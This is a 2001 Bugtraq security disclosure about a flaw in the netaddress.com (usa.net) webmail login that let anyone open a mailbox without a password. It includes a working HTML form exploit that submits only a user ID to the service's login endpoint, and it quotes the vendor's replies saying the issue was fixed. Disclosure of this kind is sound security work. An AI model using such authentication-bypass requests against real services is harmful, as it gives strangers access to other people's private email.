[22092] in bugtraq
Netaddress Secutity issue solved
daemon@ATHENA.MIT.EDU (syed mohamed)
Thu Aug 2 14:48:24 2001
From: "syed mohamed" <syedblr@hotmail.com>
To: bugtraq@securityfocus.com
Cc: da@securityfocus.com
Date: Fri, 03 Aug 2001 00:02:36 +0530
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F23osA91E9GQvnbEG100000e2ce@hotmail.com>
Hi,
Vulnerable
==========
netaddress.com mailing service
This mail is Continuation of the previous mails i sent regarding security
flaw in netaddress.com, which will open anybody's mailbox with out password.
i got a mail with attached html page. which is nothing but saved html home
page of netaddress.com(old one).Itz old home page design. when i submit the
form without password it opened the mail box. Yes it opens every mail box
without password. All you need is valid netaddress id.
Problem:
While submitting the login form to /tpl/Door/Login it needs just only three
parameters maidid, domainid(value=4), domain(value=usa.net). Create a html
file which contains all the three parameters. sumit the form to
http://netaddress.com//tpl/door/login . Note that give double slash after
neraddress.com. while i tried with single slash it didn`t work.
Here is the Exploit code(save this as html and run it in local. Submit only
with userid)
Exploit Code:
<html>
<form name="loginform"
action="http://classic.netaddress.com//tpl/Door/LoginPost"
method="POST" target=_blank>
<input type="hidden" name="LoginState" value="2">
<input type="hidden" name="DomainID" value="4">
<input type="hidden" name="Domain" value="usa.net">
<b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole -
Demo</font></b><font face="Arial" size="2"><br>
<br>
Developed By Syed Mohamed (<a
href="mailto:syedblr@hotmail.com">syedblr@hotmail.com</a>)<br>
<br>
Just Enter Login ID (enter example if netaddress id is
example@usa.net)</font>
<p>
<input type="text" size="16" name="UserID"
value="">
<input type="submit" value="Login">
</form>
</p>
</html>
I hv informed the issue to usa.net.( i had only abuse and postmaster id of
usa.net.. info id bounced back) ook 3 hrs to solve this issue.
Now they hv solved the issue.
Vendor's response:
==================
First Response:
===============
Thank you for your notification. We are addressing this issue.
Regards,
USA.NET, Inc.
Second Response:
================
Dear Sir/Madam,
USA.NET’s technical and security teams have been made aware of this issue
and it has been corrected. We appreciate your patience as we strive to
bring you the most robust email solution possible.
Regards,
Abuse Dept.
abuse@usa.net
USA.Net, Inc.
Third Respose:
=============
Yes, this problem has been corrected.
Thank you for your assistance,
USA.NET, Inc.
Thankx to usa.net for responding with great speed
Thankx to my friend Thejaswini who forwarded the old netaddress html page.
Regards
Syed Mohamed
syedblr@hotmail.com
(Wanna defeat hackers..think like a hacker.. work like a secutity expert)
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
